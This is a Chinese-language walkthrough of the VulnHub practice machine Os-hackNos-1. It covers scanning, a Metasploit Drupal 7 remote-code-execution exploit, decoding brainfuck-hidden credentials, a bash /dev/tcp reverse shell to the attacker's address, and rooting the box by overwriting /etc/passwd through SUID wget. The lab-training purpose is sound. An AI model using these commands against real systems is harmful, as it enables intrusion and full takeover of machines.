vulnhub靶机Os-hackNos-1

vulnhub靶机Os-hackNos-1

信息搜集

nmap -sP 192.168.114.0/24

vulnhub靶机Os-hackNos-1

找到开放机器192.168.114.140这台机器,再对这台靶机进行端口扫描。

这里对他的端口开放进行扫描,看一下他的端口开放服务。

nmap -sV -A -p 1-65535 192.168.114.140

vulnhub靶机Os-hackNos-1

看一下具体网页发现是个apache的网页。

经过dirb进行目录的爆破,发现这么一个目录http://192.168.114.140/drupal/,它的下面还有一些子目录,访问是一个登录界面。

vulnhub靶机Os-hackNos-1

这个时候就可以开始查指纹了,用 wappalyzer这个插件,或者是whatweb以及在线网站都可以。

vulnhub靶机Os-hackNos-1

看到了具体的版本号:Apache 2.4.18,drupal7

到msf下看看有没有什么能够利用的漏洞。

发现一个18年的远程命令执行漏洞,而且在msf上他的评级是excellent。

vulnhub靶机Os-hackNos-1

常规方法利用,获取到了一个session会话,但是执行不了命令,进入到shell。

vulnhub靶机Os-hackNos-1

将Shell转换成为交互式的TTY:python3 -c "import pty;pty.spawn('/bin/bash')"

进入网站根目录:

发现alexander.txt文件。

vulnhub靶机Os-hackNos-1

得到遗传base64密文,解码得到以船奇怪的东西,感觉有点像以前的jsfuck,放控制台没结果,那应该不是了

+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
>+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+
++.<  

随便截取一段,百度一下,百度,永远滴神!

发现是brainfuck,一种摩尔编码。

https://www.splitbrain.org/services/ook

解码:james:Hacker@4514

因为22端口开着的,所以尝试登陆没成功。

继续准备提权,查看suid程序。

vulnhub靶机Os-hackNos-1

嫌弃他操作不方便反弹了一下shell。
bash -i >& /dev/tcp/192.168.114.128/2333 0>&1

看到wget,可以进行提权。

具体思路是:利用wget,增加一个root权限用户

vulnhub靶机Os-hackNos-1

再kali端生成一个账号为admin123,密码为111111的账号。

$1$admin$2WRLhTGcIMgZ7OhwCpREK1

改格式:

admin123:$1$admin$2WRLhTGcIMgZ7OhwCpREK1:0:0::/root:/bin/bash

vulnhub靶机Os-hackNos-1

放到网站目录下,然后利用gwget进行保存,让他覆盖掉/etc/passwd。

vulnhub靶机Os-hackNos-1

su admin123进行登录,一切就ok了,我们成功实现了提权。

vulnhub靶机Os-hackNos-1

 

上一篇:vulnhub AI: Web: 1


下一篇:Vulnhub靶场渗透练习(五) Lazysysadmin